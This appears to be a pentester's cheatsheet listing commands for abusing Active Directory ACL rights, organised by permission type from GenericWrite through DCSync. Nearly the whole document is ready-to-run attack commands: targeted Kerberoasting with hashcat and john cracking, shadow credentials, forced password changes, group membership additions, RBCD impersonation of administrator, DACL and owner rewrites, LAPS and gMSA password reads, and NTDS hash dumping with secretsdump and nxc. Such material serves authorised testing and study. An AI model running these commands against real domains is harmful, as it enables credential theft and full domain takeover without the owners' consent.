AD ACLs Cheatsheet
AD ACLs Cheatsheet
AD ACLs Cheatsheet
GenericWrite on User
Targeted Kerberoasting
targetedKerberoast.py -d domain --dc-ip ip -u username -p password --dc-host dc --request-user target_user
hashcat -m 13100 -a 0 <hash_file> rockyou.txt --force
john <hash_file> --wordlist=rockyou.txt
ShadowCredentials
certipy shadow auto -u username@domain -p password -account target_user -dc-ip ip
Using Kerberos
certipy shadow auto -username username@domain -k -account target_user -dc-ip ip
GenericALL
Change Password
bloodyAD --host dc -d domain -u username -p password set password target new_password
net rpc password 'username' 'new_password' -U 'domain'/'username'%'hash' -S 'dc' --pw-nt-hash
net rpc password 'username' 'new_password' -U 'domain'/'username'%'password' -S 'dc'
Add user to a group
net rpc group addmem target_group username -U domain/username -S dc
bloodyAD --host dc -d domain -u username -p password add groupMember target_group target_username
RBCD
impacket-rbcd -delegate-from machine_name -delegate-to target -dc-ip ip -action write 'domain/username:password'
impacket-getST -spn 'cifs/dc' -impersonate administrator -dc-ip ip 'domain/machine_name:password
export KRB5CCNAME=administrator.ccache
GenericALL on OU
impacket-dacledit -action 'write' -rights 'FullControl' -inheritance -principal username -target-dn 'OU_DN' domain/username:password
ForceChangePassword
net rpc password <TargetUser> <new_password> -U "DOMAIN"/"ControlledUser"%"Password" -S <DomainController>
bloodyAD --host ip -d dc -u username -p password set password target_userename new_password
python rpcchangepwd.py <domain>/<username>:<password>@<ip> -newpass <new_password>
nxc smb domain -u username -p password -M change-password -o USER='target_username' NEWPASS='new_password'
AddMember
net rpc group addmem target_group username -U domain/username -S dc
bloodyAD --host dc -d domain -u username -p password add groupMember target_group user_to_add
AddSelf
bloodyAD --host dc -d domain -u username -p password add groupMember target_group username
WriteOwner
impacket-owneredit -action write -new-owner username -target target domain/username:password
impacket-dacledit -action 'write' -rights 'FullControl' -principal username -target-dn dn 'domain/username:password'
or
impacket-dacledit -action 'write' -rights 'WriteMembers' -principal username -target-dn dn 'domain/username:password'
bloodyAD --host dc -d domain -u username -p password add groupMember target_group username
WriteSPN
bloodyAD --host dc -d domain -u username -p password set object target servicePrincipalName -v 'domain/meow'
impacket-GetUserSPNs domain/username:password -dc-ip ip -request
or
targetedKerberoast -d domain --dc-ip ip -u username -p password --dc-host dc --request-user target_user
AddKeyCredentialLink
pywhisker.py -d domain --dc-ip ip -u username -p password --target target --action add
gettgtpkinit.py -cert-pfx file.pfx -pfx-pass pfx_password domain/target ticket.ccache -dc-ip ip
getnthash.py domain/target -k key -dc-ip ip
or
certipy shadow auto -u username@domain -p password -account target_user -dc-ip ip
ReadLAPSPassword
nxc smb target -u username -p password --laps
ReadGMSAPassword
nxc ldap target -u username -p password --gmsa
DCSync
impacket-secretsdump domain/username:password@domain
impacket-secretsdump domain/username@domain -hashes :hash
impacket-secretsdump dc -k
nxc smb target -u username -p password --ntds
nxc smb target --use-kcache --ntds
Resources
- https://www.thehacker.recipes/ad/movement/dacl/
- https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/acl-abuse
- https://mayfly277.github.io/posts/GOADv2-pwning-part11/
- https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces
This post is licensed under CC BY 4.0 by the author.